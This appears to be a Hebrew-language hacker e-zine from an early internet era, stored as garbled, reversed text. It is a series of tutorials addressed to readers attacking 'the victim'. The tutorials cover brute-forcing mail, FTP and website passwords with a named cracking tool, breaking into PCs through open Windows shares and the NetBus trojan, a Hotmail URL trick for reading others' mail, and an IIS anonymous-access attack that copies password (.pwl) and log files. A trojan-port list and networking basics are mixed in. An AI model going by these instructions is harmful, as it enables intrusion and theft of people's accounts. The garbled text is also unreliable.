.תרשה תא ומשרת .ןברוקה לש ראודה תבית תא ןסחאמש ראודה תרש
#גאב ...תושעל והשמ דוע םכל שי username תורשפאב ורחבת always use this
username .:
אוה ןברוקה לש ראודה םא niv¡zahav.net.il םכל העיפומש הביתב ומשרת (
תורשפאב םתרחבש ירחא
םש ומשרת :$אבה שמתשמה םשב שמתשת דימת$ niv .
'ה #גאב password תורשפאב הנושארה םעפב ורחבת read from this file .
....ךכ לכ ייא אל םדקתמש ךילהת הזש וארת .רושיא וצחלת
תורשפאב ונשמתשה יכ read from this file תומש הסנמ אוהש רמוא הזש (
.סק ךמסממ שמתשמ
תורשפאב ורחבתו ובושת (אל םא .םכל עידוהל רומא הז (אוצמל חילצה הז םא
all possible combinations 'ה #גאב password .רושיא וצחלת וישכע .
לכ תא הסנמ הז יכ (םימי המכ וליפאו תועש הברה תחקל לוכי הז ךילהת
תויורשפאה
.אמסיסה תא םכל אצמי הז רבד לש ופוסב .)!!( אמסיסב בותכל רשפאש
'ב ןובשח וחתפת זא outlook ....םתרחבש אמסיסה םע (תרחא ראוד תנכות וא
+אל דמחנ ....םכילא עיגי (ןברוקל וחלשיש ראודהש הככ
FTP server 'ב םימשור םתא םעפהש קר ....תמדוקה תורשפאה ומכ שממ ' host תא
'ה תרש FTP ...סנכיהל םיצור םתא וילאש
'ב רתאל !ורפל םיצור םתא דיגנ םאו IOL :איה ותבותכש (
members.iol.co.il/avi
'ב ומשרת זא hosts :תבותכה תא members.iol.co.il 'ה #גאבו username
ומשרת avi .
'ה לש םדוקה רבסהה ומכ קוידב ראשה pop3 .
HTML form הנכה .םירתא לש אמסיס תולגל ידכ ילע תפדעומה הישה וז '
:תמדקומ
'ב רתא לש אמסיסה תא תולגל םיצור םתא םא homestead 'ל וסנכית (
homestead (
'ה #ד לש קנילה תא וקיתעתו login .
תורשפאל וסנכית HTML form ירפתב access תבותכה תא וקיבדת םשו (
'םתקתעה םדוקמש
'ה #דל תבותכה login לע וצחלת . click here to get automaticly info .
ליבומ הז וישכע .רושיא וצחלת (סקה תוביתב והשמ םכל בתוכ הזש ירחא
ןולחל םכתוא
'בש רכומה ftp 'בו pop3 'ה םא .וב ונשמתשה username אוה רתאה לש
kaka ומשרת ( kaka #גאב
'ה username ....תומדוקה תומישמה יפל תושעל המ רבכ םיעדוי םתא זאו .

HTTP basic סודניוו לש ןולח ןמ עיפומש רתא םכל שי םא וז תורשפא לע וצחלת '
.אמסיס שקבמו
.תומדוקה תומישמה יפל תושעל המ םיעדוי םתא

2 .הלקה וזיא .........ואוו .
.הנכותב תורחא תויורשפאל וישכע רובענ בו

93;
:ילורבה חוכה עוציבל םיירשפאה םיוותה תריחב


ירפת לע וצחלת options לש תורשפא שי םש . character set .
.ילורבה חוכב הסנמ אוהש םיוותה לכ תא םיאור םתא הנה .הב ורחבת
.$0$ ותה תאו $'$ ותה תא #יסוהל !ילממ ינא
יפ ייא #ויז

עדי אל תרשהש הככ הבושח דואמ וז תורשפא
.אמסיסה תא חצפל םיסנמ םתאש ןיבמ אוה םא הרשמל ןנולתי אלו םתא ימ
+הז תא םישוע ךיא

תורשפאל םיסנכנ network options ירפתב options .
ומשש גת שי םש hide IP םש ומשרתו וילא וסנכית . 0.0.0.0
.הנכותה לש המושרו האלמ הסריגל קר תרתומ וזה תורשפאה

3 +הנכותה תא םידירומ הפיאמ .
:אבה קנילהמ
http://packetstorm.securify.com/Crackers/wwwhack.zip
!בוקה תא םדוק וחתפת .הלוענ אלה הסרגה וז .םשמ ודירות patch זאו
לע וצחלת wwwHack .
'ב ושפח קארקה תא www.astalavista.box.sk .םש ואצמת םתא (
GOLGOLET
9:*
אל סוריו ינאהש וליפא (תיעוצקמ ךרדב ןאיור ךילע שיש תולגל רשפא ךיא
...ההזמ
+ןאיור םצעב הז המ
'''''''''''''''''''
(ןאיור הז המ םיעדוי אל םתאש בשוח אל ינא ....אל אל
...השוע תמאב הזש המ תא ריבסא ינא קר
.ולש רופהו ןאיור לכ ' םיוסמ רופ חתופ ןאיורה
.בשחמה לע ונל לושו רקאה אוהש בשוחש רמייל סנכנ רופ ותוא ךרד
שי םשש וזכ הרהנמ רצוי אוהש ומכ ' םירמיילל ךרד סלפמ םצעב ןאיורה
.םיוידיא לש הדרסווא
++בשחמה לע לעפומ ןאיור שיש תעדל רשפא ךיא
'''''''''''''''''''''''''''''''''''''''''
.םיוסמ בשחמ םע תרושקת רצוי אוהו (םירופ חתופ ןאיורה ונרמאש יפכ
...הדמחנ הדוקפ םתוא דמלא ינא וישכע
ל היינפה .'''' תוינכות .'''' לחתה .'''ל וסנכת MS DOS\ Ms Dos prompt
.סוד ...רוציקב
הייקיתב םתאש םגו נרניאל םירבוחמ םתאש ואדוות C:\Windows סודניוו לש הייקיתב וא
...תרחא
...ייקוא
:האבה הדוקפה תא ודילקת
netstat -a
++השוע הדוקפה המ
ונא םהילאש םירופה תאו (רחא בשחמ םע בשחמה לש תויורשקתהה לכ תא הארמ הדוקפה
.םירבוחמ
:ךכ ךרעב הארנ הז
Proto Local Address Forigine Address State
9:+
TCP bla:138 bla:0 listening
TCP bla:137 bla:0 listening
TCP bla:31337 bla:0 listening
'''''''
TCP bla:1025 bla:0 listening

...הלאכ ינימ לכו
!!!לבא
!וארת
רופ ונל שי 31337 !!חותפ
+רמוא הז המו
לש רופ ונל שי BackOrifice !חותפ
ונל שיש תרמוא תאז BackOrifice !בשחמה לע
...יפוי
...ותוא לסחנ וישכע
.ןקה רזממה תא ונספת .הנה
.סוריו ינא,לוורייפ לש הרזע ילב בשחמה לע ןאיור ונאצמ
:םיצופנה םינאיורה לש םירופה לש המישר
!!!דואמ רזוע
'''''''''''''''''''''''''''''''''''''''
The tHing
6000
NetBus 1.x
12345
NetBus 1.x (avoiding Netbuster )
12346
NetBus Pro
20034
BackOriffice
31337
SubSeven
1243
NetSphere
30100
Deep Throath
6670
9:9
Master Paradise
31
Silencer
1001
Millenium
20000
Devil 1.03
65000
NetMonitor
7306
Streaming Audio Trojan
1170
Socket23
5000
Socket25
30303
Gatecrasher
6969
Telecommando
61466
Gjamer
12076
IcqTrojen
4950
Priotrity
16969
Vodoo
1245
Wincrash
5742
Wincrash2
2583
Netspy
9:3
1033
ShockRave
1981
Stealth Spy
555
Pass Ripper
2023
Attack FTP
666
GirlFriend
21554
Fore
50766
DeltaSource (DarkStar )
6883
Tiny Telnet Server
34324
Kuang
30999
SennaSpyTrojans
11000
Backdoor
1999
WebEx
1001
UglyFtp
23456
TrojanCow
2001
TheSpy
40412
Striker
2565
9::
Silencer
1001
RoboHack
5569
RemoteWindowsShutdown
53001
Prosiak 0.47
22222
ProgenicTrojan
11223
PortalOfDoom
9872
InIkiller
9989
IcqTrojan
4950
BladeRunner
5400
Wingate (Socks-Proxy )
1080
subseven
27374
dolly1.6
1016
dolly1.5
1015
GOLGOLET
9:=
tcp\ip
לש תוביתה ישאר tcp\ip וידחי םידבועה םילוקוורפ לש הלודג החפשמל םיסחייתמ
לע תודבוע תרושקתה תותשר לכ עמכ םויה tcp\ip
תרושקת tcp/ip תיללכ
תרושקת תועצמאב רשוקמה בשחמ לכ tcp\ip ( חראמ בשחמ ארקנ host )
( תרש תויהל לוכי חראמ בשחמ server םירחא םיחראמ םיבשחממ תושקבל ןיתממ תרש ' )
ביגמ אלש וא םינותנ םע ביגמו תודוקפל תייצמ
( חוקל תויהל לוכי חראמ בשחמ client הלועפ עוציב ךרוצל תרש לא תושקב חלוש חוקל ' )
:אמגודל
חוקל אוה הזה סקה תא ונממ םיארוק םתאש םכלש בשחמה
תשקב שיגמ םכלש בשחמה get תרשל web דוק ול ןתונ תרשה
יפדל דוקה תא םגרתמ םכלש ןפדפדהו html וא asp הפש לכ וא
( בתנ תויהל לוכי חראמ בשחמ router לש דעיה תובותכ תא ןוחבל אוה בתנה לש דיקפתה ' )
תוסנכנ תועדוה
רחא רשקמ בשחמ וא יפוסה דעיה תויהל לוכי הז'ןוכנה בשחמל ןתוא חולשלו
:אמגוד
ושיקהו סוד ןולח וחתפ
tracert yahoo.com
+הרק המ
יפוסה דעיל עיגהל ידכ רבוע םכלש בשחמהש םיבשחמה לכ תמישר תא הארה םכלש בשחמה
יפוסה דעיה אוהש ןורחאהמ !וח םיבתנ םה אלא לכ
( תשרל רשקמ תויהל לוכי חראמ בשחמ gateway אוה תשרל רשקמ בשחמ לש דיקפתה ' )
9:J
תרחא ךרדב תורשוקש ןניאש תותשר ןיב בושו ךולה תועדוה ריבעהל
תונוש תויגולונכ וא,ו םילוקוורפב תושמתשמ הלא תותשר תובורק םיתיעל

תבותכ ip
ip - internet protocol
תבותכ שי חראמ בשחמ לכל ip תדחוימ
תבותכ ip ןב רפסמ איה 32 ומכ תובותכל םיליגר םתא חב תויביס
yahoo.com ירפסמ (תויתימאה תובותכה תא שפחל ידכ קר תושמשמ הלא תומש לבא "וכו
יפייאה
תבותכ ip כ ללכ ךרדב תבתכנו תגצומ 4 :םיינורשע םירפסמ
212.32.9.231
אוה רפסמ לכב הובג יכה רפסמה 255
תובותכ לש םיגוס ינש שי ip
1 ינפל התוא רידגהל וכרצת םכלש קר איהש העיבק יפייא תבותכ ' תיס יפייא תבותכ .
#סונ םוכס םלשל וכרצת (םויה הלאכ תובותכב ושמתשה םעפ נרניאל םירבחתמ םתאש
םכלש קפסל
יס יפייא לבקל ידכ
2 נרניאל םירבחתמ םתאש עגרב תנתינש תבותכ איה תימאניד יפייא תבותכ ' ימאניד יפ יא .
תחא םילבקמ םתא תרשל םירבחתמ םתאש עגרבו (יפייא תובותכ לש המישר שי קפסל
רחא שמתשמש ידכ קפסה לש יפייאה תובותכ תמישרל רזוח יפייאה םיקתנתמ םתאש עגרב
לכוי
תבותכב שמתשהל

' האיציה רפסמ port
בשחמב םייוסמ םושיי רותיא ךרוצל םג השורד איה (בשחמ רותיאל הקיפסמ יפייא תבותכ
יפייאה תבותכ תא בתנל שי זא נרניא #דל השקב איה תסנכנה העדוהה םא (אמגודל
נרניא יפד הצוחה תחלושה תינכותל
( האיציה ירפסמ ארקנה יוהיז רפסמ שי port )
העדוה לכ םע חלשנה
םירדנס םה םימייוסמ םירופש ךכ (יפייאה תבותכ תאו רופה רפסמ תא תעדל חלושה לע
:אמגודל
םינומש רופלו תמייוסמ יפייא תבותכל םיכלוה םתא נרניא #ד לבקל םיצור םתאש
תרש שמשמ םינומש רופ web
:םירדנסה םירופהמ קלח לש המישר הניה
21 ' ftp
23 ' telnet !ירהל םילוכי םישמתשמה זאו ללאש תונובשח םישמתשמל ןתונש רופ הז
תרשה לע סקינוי תודוקפ
25 אצוי ראוד רופ '
43 ' whois תרשה לע עדימ ןתונש רופ והז ....הללאל בושח הזה רופה םירקאהל
9:N
79 ' finger ןתונ הז אופ םהינימל םירקאהל בו שממ שממ הז חותפ אוה םאש רופ הז
רברסה לעש םישמתשמה לע עדימ
80 לש רופה הז ' http נרניא יפד וליאכ
110 ליימ יא תאירק '
139 םיפותישה לש רופה '
433 לש רופ ' https תשר http תחבואמ
1080 יסקורפ יתרש שמשמ ללכ ךרדבש רופ '
6667 לש רופה ' irc
רעצמ רכוז ינאש םירופה לכ הז הלאוו
תובותכ ip תודחוימ
:תונוש תורמל וצקוהש תודחוימ תועובק יפייא תובותכ המכ שי
127.0.0.1 הז ' loopback, loopback (רמולכ ימוקמ יפייא םצעב הז
החלשנ איה ונממש בשחמל רוזחת אלא (תשרל חלשת אל תאז תבותכל תחלשנה העדוה לכ
192.168.1.1-192.168.1.254 תימוקמ תשר לע םיבשחמ שומישל דעונ הזה חווה '
נרניאה לש סמועה י$ע וערפוי אל םלועל םה (תומייוסמ תואיגשמ !וח
255.255.255.255 תימוקמ תשר לע בשחמ לכלש העדוה רדשי הזה יפייאה '
תבותכב םישמתשמ םכלש תימוקמה תשרב םיבשחמהש החנהב
192.168.1 . xxx
ה( xxx )ןורחא
ב שומיש ידכ ךות םלוכ לא רדשל םילוכי םתא
192.168.1.255
GOLGOLET
9:.
םייסיסב םיגשומ
ןא"גור סוס םע ליגרתהמ עיגה םשה( הצירפ תנכות הנווכה ןא"גור '
םיצבק ינש םימייק הצירפ תנכות לכב ()םינאיורה לש הקיתע המחלממ !עה
server.exe ו client.exe
ה server ה(וילא !ורפל םיצורש שמתשמל חולשל ךירצש !בוקה אוה client
ה תרזעב (הרקב חולה הז client ליעפהש ימ לש בשחמל סנכנ התא הנכותה לש
ה תא server.exe
סוריו בשחמה לש הרדגהב ךא הלוח לש #יגנ אוה תיעדמ הרדגהב '
סוריוה תא םיליעפמשכ (קזנ ארקנ אוה םלש םלוע םצעב אוהש
סוריוה גוסב יולת הזו איהשלכ היעב(הלקתל םרוג אוה
יפ יא לבקמ התא תרשל רבחתמ התאש םעפ לכ .תרשב שמתשמ לש רפסמ הז '
.יפ יא רפסמ םיכירצ ךבשחמל !ורפל ליבשבש שדח יפ יא רפסמ
םסיס ' system סוודניווה תלעפהל דואמ םיינויח הלעפה יצבק :
.הלאכ םיצבק תואמ םנשי
exe )הלעפה יצבקו םיסוריו םימעפלו( הלעפה יצבק,םיצבק,םימושי '
)הלעפה יצבק שי םינוש םיקחשמל םג(הלעפה יצבק םה
רופ ןייל ןוא רבוחמ התאש בשחמב ךלצא חותפש תרש '
:לשמל םירופל םירפסמ ינמ לכ שי 12345
' ירסי"גר registery ךותב םשרנ בשחמב םשרנש המ לכ בשחמה לש בלה םצעב והז '
.ירס"גרה
םירושק םצעב םה רישי וא #יקע ןפואב םירושקש םירבדה לכו םיניקתמ םתאש תונכותה
.ירס"גרב םשרינ אוה םייוסמ תיב #ד םיעבוק םתא םא לשמל ירס"גרל
9:;
GOLGOLET
.ינאיור סוס אלל #ותיש ךרד הצירפ
םיכרצ םתאש המ :
)הבוח( םיידי
)הבוח אל( לכש
הנכותה תאו scanip20
ב ואצמת םתא הנכותה תא kazaa .
1 יפ ייא יוליג ןושאר בלש.
רפינס ומכ יפ ייא יוליגל הנכותב שמתשהש תולגל עדוי אלש ימל
ויק יס ייא ךרד יפ ייא הלגמ איהש
2 #ותיש ןברוקה לש בשחמל שי םא תעדל.
...#ותיש ןברוקל שי םא תעדל לוכי ינא ךיא םילאוש חב םתא
יפ ייא םילגמ םתאש ירחא זא בו
( הנכותל םיסנכנ םתא scanip20 )
הדרוהל http://reshet3000.com/ipdet.exe
ונל הארי אוה וישכעו .םש וארת םתאש תורושה ינשב ןברוקה לש יפ ייאה תא םימשורו
:תואבה תואצותה תא
.בושח שממ אל הזש הדובע תצובקו (#ותיש שי םא הארמ(בוש יפ ייאה תא(בשחמ םש
סולפ ןמיס םיאור םתא לאמש דצב םא
)אמסיס שי ןכ םא אלא( בשחמל ול !ורפל םילוכי םתאש רמוא הז זא
.ןברוקל !ורפל םילוכי אל םתא זא (סונימ אלא סולפ וארת אל םא
(יפ ייא ונל שי וישכע דע בו
.!ורפל ידכ םילכה לכ תא ונל שי (קיפסמ הזו ...#ותישו בשחמ םש
םירבדה לכ תא ונל שיש ירחא וישכע
+++םיצרופ לאזעזעל ךיא
2222 תויקתו םיצבק שפח 222לחתהל וסנכת בו
!בוקה תא ושפחת
LMHOSTS.SAM
+םישוע המ (ליגר !בוק םכל אצמי הז
9=*
(ותוא וחתפת
תומישר סקנפ תינכותב ורחבתו המל ודרת
)השדח הרוש( הנורחאה הרושל וכלת וישכע
בשחמה םש חוור ןברוקה לש יפ ייאה תא ומשרתו
ןברוקה לש יפ ייאה דיגנ 212.179.144.23 :אוה ולש בשחמה לש םשהו user
:םימשור םתא זא
212.179.144.23 user
םתמשרש ירחא
)לאמש דצמ הלעמל( !בוקל וכלת
רומש ושעתו
סקיא זאו
.ונלצא ןברוקה לש בשחמה תא ונרדגה :הז ונישעש המ
...לכה תא ונישעש וישכע (בו
.........#יכ יכה עגרה אב
!#וס #וס ול !ורפל
:הז םישוע םתאש המ וישכע
22םיבשחמ 2222שופיח 2222לחתהל םיסנכנ
( בשחמה םש תא ומשרת םשו user )
יפ ייאו בשחמ לש רויצ םכל הארי הז וישכע (תוינש המכ חקי הז שפח ושעתו
.בשחמה לע םיימעפ וצחלת ושפ
םיהולא ינאש ודיגת םתא וישכע
בשחמל ול ונצרפ יאוו
בשחמב םיצור םתאש המ תושעל םילוכי םתא וישכע
)...םכל אבש המ לכו(םיצבקה לש תומש תונשל(םיצור םתאש תונכות תא ול תחקל(קוחמל(
.םתנהנש הווקמ.ילש ךירדמה היה הז בו RESHET
3000
תולקב בשחמל רורא תועדוה תאלעה
(םלוכל םולש
תולעל םילוכי םתא ךיא םכל ריבסא ינא םעפה (ונהתש הווקמ ינא (ילש הנושארה הבתכה תאז
:סודניוו ול שיש הרקמב בשחמל רורא תועדוה והשימל XP NT WINDOWS2000
:םירמוח (ושפ ארונ והשמ תושעל ךירצ תאז תושעל ליבשב
1 ןבורקה לש יפייא.
2 םיידי.
3 בשחמ.
:אבה רבדה תא םיבתוכ םשו הלעפה.'''''לחתה לע םיצחול :הככ זא
net send )ןברוקה לש יפייאה( )ךל םולש :אמגודל בתכיתש הצור התאש רוראה תעדוה(
םלעי סודה ןולחש דע תוכחלו ושפ רנא תושעל הז ירחא (םיירגוס תושעל ךרוצ ןיא ןבומכ
ןיאש הרקמב
ןולחש דע תוכחל (שיגדמ ינאו (היעב אלל הלעת העדוהה יפ סקאה לש לווריפה תא םדא ןבל
סודה
.העדוהה תא לבקמ אוה זאו םלעי
:אמגוד net send 127.0.0.1 hi stupid boy
.ונהתש הווקמ
RESHET3000
9=+
עלקמ 1
םירמוח :
• הלוק קובקב 1.5 .ריל
• .םיירפסמ
• .ןולב
• .)הלאה תונקה תומוחהמ( הליגר הימוג
• .ןק היהיש לבא קורזל והשמ
:הנכה תוארוה
(ולש ךפשמה תרוצ הליחתמ ונממש םוקמב םיירפסמה תרזעב ותוא םירזוגו קובקבה תא םיחקול
.)...תורחא תוצצפל וב שמתשהל ולכות ילוא( ותוא םירמושו קקפה תא םיאיצומ ןכמ רחאל
.ותוא #ועתש הככ קובקבה לש היפל ולש היפה תא םירבחמו ןולבה תא םיחקול םתא וישכע
ןולבה תא קיזחת איהש הככ היפהו ןולבה לע התוא םיפפלמו הימוגה תא םיחקול םתא וישכע
.ררחתשי אל אוהש ידכ קזח
םיחמצ שי( הבע ירפ תכיתח הזיא וא )באכ תמירגל !למומ( הנק ןבא םיחקול םתא (#וסבל
ילש רבח הרקמ לכב לבא םיבאוכ שממ אל םהו לכאמל אל םינק תוריפ םילדגמש הלאכ
.)...םהב שמתשה
9=9
קוחר #ועת ןבאה .םיררחשמו םינווכמ זאו ותוא םיחתומ םתא ןכמ רחאל (ןולבל התוא םיסינכמו
)!צח ינבא קר רתומ הז ללגב קובקבה לש היפהמ הנק רתוי הברה תויהל תבייח ןבאה( .הללאל
GOLGOLET
םירמיילה לש הנכותה סבנ
ליחתנש ינפל זא סבנ הנכותה לע םכל ריבסהל ךלוה ינא ןכ ןכ
.דומלל םיכלוהש המ לע סקדניא בותכי ינא
:ךירצ המ :סקדניא
תנקתומ הנכותה סבנ
)ותיא םיבשוחש הזכ( חומ
רומוה שוח
ןיבהלו דומלל ןוצר
9=3
הזה ןולחה עיפוי סבנ וחתפ ןושאר רבד הככ זא
.לוחכב תנמוסמש יפ יאה תביתל בל ומיש
ןברוקה לש יפ יאה תא ומשיר ןאכ
ודילקה רופה תביתב :רופ 12345 סבנ לש רופה והז
ןקתומ סבנ לש ש"אפהש הלאכל קר דחא לכל !ורפל רשפא יאש ןאכ ריכזמ ינא :תורבחתה
#וסב ריבסי ינא ש"אפל והשימ רבחל וצרת םא םלצא
רותפכ לע וצחלתש רחאל זא יקוא 9o..e9$ המל בותכי סבנ
$ 9o..e9$ $o 135.432.432.214 8e> s*. 20P9P01 $
.תושעל רשפא המ הארנ ואוב וישכע םירבוחמ םתאש םכל הארי הז
9=:
Se"5e" 4/+%. ךלש בשחמב יפ יאה תא תרמוש תאז תורשפא
O,e. 9/ "o+ עשעתשהל דמחנ םיקסידה ןנוכ תא ןברוקל חתפ
S-o! %+40e ןברוקה בשחמב הנומת חתפ
S!4, +o*se רבכעה תא עקות
S$4"$ ,"o0"e+ ןברוקה לצא סוריו וחתפ !בוק חותפל היצפוא ןתונ
Bs0 +4.40e" הצור התאש מרופב עדוה חלש
S9"ee./*+, ןבצעמו ןבל ךסמ ליעפמ
:e$ %.8o רוורסהו תרשה לע אוהש לכ עדימ ןתונ
3o"$ "e/%"e9$ ןברוקה לצא םיחותפ םירופ ךל הארמ
3&4y so*./ םכלש לוק וילקה באוו !בוק חותפל תורשפא ןתונ
Exs%$ !%./o!s בשחמ יוביכ תויורשפא
Se./ $ex" ןברוקל סק חלש
A9$%5e !./s
Bo*se ,os רבכע תלועפ קיספמ
L%s$e.
So*./ sys ןברוקה לש דנואסה תרקבל השיג םכל ןתונ
Se"5e" se$*, רוורס תרקב
Co.$"o& +o*se רבכעה םג זוזי ןברוקה לצא רבכעה תא וזיזהו תאז תורשפא לע וצחל
:o $o *"& נרנא רתאל ןברוקה תא חלשו רתא תבותכ םושר
Key +e.e0e" םישקמ תורשפא
F%&e +4.e0e" !!!!!!!! הרקבה חולל השיג
זא סבנ לש ש"אפל םישנא רבחל ךיא לע בותכי ינאש יתחבה תויורשפאה לע רבסהה ןאכ דע
.אב הז הנה
9==
הסיו הל הסאב הז תא ושפח סבנ לש ש"אפה תא ודירות ןושאר רבד .e$>*s לכ אצמי הז
. הנכותל רושקש המ
לש קחשמ ךרעב הז זא 10 20 קחשמה ירוחאמ םצעב לבא דמחנ הז קחשמב םיקחשמש תוינש
םלוכש ןק תרש וליאכל ךפהנ קחשמב קחשמש בשחמה ןוכנ רתוי רופ תנקתה להנתמ דומחה
אוה סבנ לש רופהו וליא רבחתהל םילוכי 12345 קחשמ הצור אוה םע והשימל ודיגת זא
וניהתו סבנ לש ש"אפה תא ול וחלש
GOLGOLET
9=J
ליימוהה גאב
םכל שי םא YES :אוה יתימאה ומש ק ייההו נרניאה !ורע לע םתעמש חב זא
TECHTV .
...יתשפיחו יתשפיחו לגוגל יתסנכנ בוש (ליימוה לש גאבה לע ורביד תחא תינכות הזיאב זא
'ב והשמ יתאצמ #וסבו
www.astalavista.com
)! ןייוצמ רתא(
.( ילגנאה ליימוהב קר לעופ הז יל הארנ %% com )
הנכותה םע ךכ רחאו תינדיה ךרדה תא םכל גיצי ינא וישכעו (ותוא יתנבהו סקה תא יתארק
)...ישומיש תויהל לוכי(
)...הגשהל השק אל הז( ...םדא'ןבה ותוא לש שמתשמ םשה תא תעדל םיכירצ םתא (לכ םדוק
:לקה קלחהו
ושעת( CTRL+SHIFT )בו רתוי תוארל ידכ ילאמש
http://pv2fd.pav2.hotmail.msn.com/cgi-
bin/saferd?_lang÷EN&hm___tg÷httpº3aº2fº2f64º2e4º2e36º2e250º2fcgi
º2dbinº2fgetmsg&hm___qs -
º26msgº3dMSG998047250º2e22º26startº3d9702º26lenº3d9687º26raw
º3d0º26diskº3d64º2e4º2e36º2e68_d1577º26loginº3dusername
º26domainº3dhotmailº2ecom&hm___fl÷attrd&domain÷hotmail.com
תחא הרושב תויהל ךירצ הז לכ
:רבסה
USERNAME ...שמתשמה םש -
MSG943322803º2e16 )...הזב ןודנ ךשהמב( העדוהה לש רפסמה הז -
:הז תא וסנ תלעופ אל תבותכה םא
http://lw14fd.law14.hotmail.msn.com/cgi-
bin/saferd?_lang÷EN&hm___tg÷httpº3aº2fº2f64º2e4º2e36º2e250º2fcgi
º2dbinº2fgetmsg&hm___qs -
º26msgº3dMSG998047250º2e22º26startº3d9702º26lenº3d9687º26raw
º3d0º26diskº3d64º2e4º2e36º2e68_d1577º26loginº3dusername
º26domainº3dhotmailº2ecom&hm___fl÷attrd&domain÷hotmail.com
...םיללכ םתוא יפל
'ב תועדוה אורקל םיצור םתא םא %% hotmail.co.il תא ונשת hotmail.com 'ל hotmail.co.il
!!! קודב אל %%
...הלש רפסמה תא תעדל בייח התא תמייוסמ העדוה אורקל ידכ
:ריבחתה
MSG943322803XXX
X והשלכ רפסמ-
9=N
...הנכותה תא שי ךכ םשל .....העדוהה רפסמ תא שחנל הז השקה קלחה
:הנכותה תא דירוהל ידכ
http://astalavista.com/hacking/password/hobo04r2.zip
! םוקמ לכב דחא לכמ ךרד לכבו הרוצ לכב םרגייש קזנ םושל יארחא אל ינא
!םכתוירחא לע םישוע םתאש המ לכ
!ליימיא אורקל םיסנכנש םיפיאה תא תקדוב ליימוה
!יארחא אל ינא םכתמשא הז םתקפדנ םא
! הסיו הל הסאל וכל דוע אורקל םיצור םתא םא הזה גאבה תא יתיליג אל ינא
www.astalavista.com
HaSaTaN
9=.
!!!ם'י'ר'ת'א'ל ה'צ'י'ר'פ
(םלועב רתא לכ walla goop google לש םיצבקה לכ (םיצבק לש תחא הצובקל םיכייש !םלוכ
!תרש לע םינסחואמ םירתאה
'ל אב התאשכ explorer 'ה (איהש לכ תבותכ שיקמו explorer םיצבקה תא חתופ םצעב
.תרשה לע םינסחואמש
גוסמ םיתרש שי (םיתרש ינימ לכ םנשי iis !םיתרש יגוס הברה דוע שיו
()רתאה ךותל הרידח ךרוצל ולצנל ןתינש םוקמ וא (יתונכת גאב( גאב ונשי (תרש לכל עמכ
.)םייולפסקאב קוסעת (האבה הבתכה( יולפסקא ארקנ הזה $גאב$ה
רתאה תא יתחתפש דיגנ walla !בלש בלש הארנ ואוב +הרוק המ
1 'ה . explorer .וילא השיג גישהל תרשהמ האשרה שקבמ
2 :םיאבה םירבדה וארקי רשאי תרשה םאב .
ךיתולועפ לכ תא םושריו ךתוא ההזי תרשה %
'ה % explorer !בוקה תא חתפי html וא htm גוסמ תרש לע ןסכואמש רתאה לש iis !חיננ
'ה רפסמ תאו םכתא ההזמ תרשה (בל םתמשש חינמ ינאש יפכ Ip תארקנש הבתכב (םכלש
proof-pc !םכימצע תא ריתסהל ךיא ודמלת
( נלב עצבל ןתינ הלועפ התוא תא telnet :הלעפה2לחתה2 י$ע ) telnet
'ב ומשיר host :// אלל( רתאה תבותכ תא http 'בו ) port ובתיכ 80 הייפצה לש רופה והזש (
.נרניא יפדב
רתאהש תרשה גוס תא וארת המשו יהשלכ האיגש תעדוה יאדוול ולבקת (והשמ ושיקתש ירחא
!וילע !ר
נל'ב וליאו (יפרג לכה (ןפדפד 'בש קר (ןפדפד רותב נלב ונשמתשה הז (ונישעש המ םצעב
!תודוקפ םישיקמ ונחנא
HaSaTaN
ם'י'ר'ת'א'ל ה'צ'י'ר'פ 2 !!!
9=;
++הזל םתיכיח ןוכנ
+ןוכנ (ןוכנ
' הצירפ ' לע ' ךשמה ' תבתכ$ לש סקדניאה הנה ךישמהל םיצור ךכ ל םתאש ללגב זא
:$םירתאל
1 ( יולפסקאה והמ . exploit )
2 דבוע אוה ךיא .
3 ושפ יולפסקאל אמגוד .
1 .
שי דיגנ םדוקה ןויליגב יתרבסהש יפכ זא (עודמ וניבת םתא דימו ($לוצינ$ ומוגרת יולפסקאה
וניניינעל (םיוסמ תרש iis לכב (ילש ארחהמ שפי רתוי (שפי דואמ היה הזה תרשה להנמ (
( חתפ ריאשה הז השע אוהש המ (הרקמ exploit ןב דליש לודג ךכ לכ ) 3 !וילא !ורפל לוכי
( ימינונא שמתשמ רותב (תרשל סנכנ אוה דואמ (ושפ היה השע אוהש המ anonymous לא ()
.ריבסא רבכ ינא וגאדת
יתרשב דחוימב הצופנש (תורשפא הנשי FTP ליבשב ()תוהז תסנכה אלל( ימינונא ןפואב סנכיהל
.שמתשמ םש רותב )ל$אוד( ליימיאה תא ךממ שקבמ תרשה תרשב תועונתה לש םושירה
םשב (דחא תרש זא IIS 4.0 v ךיא )...חחח( תימינונא הסינכה תא רשפאמש הזכ חתפ ריאשה
.$...פוסורקיימ הז םא אלא העו אל בשחמה$ :םירמוא
.תרשה לוצינל תויורשפא יגוס המכ םנשי (תאזה אמגודה תא יתאבהש ומכ זא

2 .
ok :הככ זא (
ללאשה ךרד תודוקפה תא לבקמ תרשהש ךכ תרשה לע יולפסקאה תא םיצירמ ונא םצעב
'ל יולפסקאה תא םתלעהש רחאל )האירקל הבוח (הזה ןויליגב תאבומ ללאש לע הבתכ( םכלש
box .)ללאשה לש הבתכה תא וארקת( םכלש
תפשב בותכ יולפסקאה c )) וא c רומא אוה יוארכ דבוע יולפסקאה םא (כ$דב הצרהה רחאל (
:מ העיגפה תמר תא גרדל םיגהונ כ$דב (תרשב והש ךיא עוגפל 1-5 (אמגודל (העיגפל רבסה )
ודיל בותכ היהי ' יולפסקא אצמת םא 4 $ :אמגודל ותעיגפ תא םג 'ו )אמגודל( 5 ( you'll get
root pozitive $ :שוריפ( $ 5 כ$כ הניא העיגפ יתאזכש ןבומכ ()$לוש תדמע לבקת התא (
.הצופנ
3 .
ודמלתש רחאל c )) וא c לוכי םצעבש( יולפסקאה תיינב ךרד (תרשה םא רשקתל ךיא ודמלת
אמגוד ןתא ינא הרקמ לכב (םייולפסקא תונבל ועדת ()םתנבה םא יולפסקא אל תויהל
:ןיבהל םכל אוזעי הז לבא קיחצמ הזש עדוי ינא (תרבודמ תילגנאב
,%
לש תויתימאה תודוקפה אל םה תודוקפה c )) וא c .הלילק אגמוד קר םה (
%,
connect )תרשל תורבחתה(
hello )תוהדזה(
: copy `.pwl a 'ה יצבק לכ תא קתעה( pwl חב רבכ םתא ילש תונויליגה לכ תא םתארק םא (
הז המ םיעדוי pwl )
: copy `.log a יצבק יבגל קר ל$נכ( log .)
quit )תרשהמ תוקתנתה תורחא םילימב וא (האיצי(
+הז יולפסקא לש העיגפה תמר םכתעדל יהמ קודבנ אבה (וישכע
'כ הז תא גרדי ינא בו ...ונ (תצק ובשחת 3
9J*
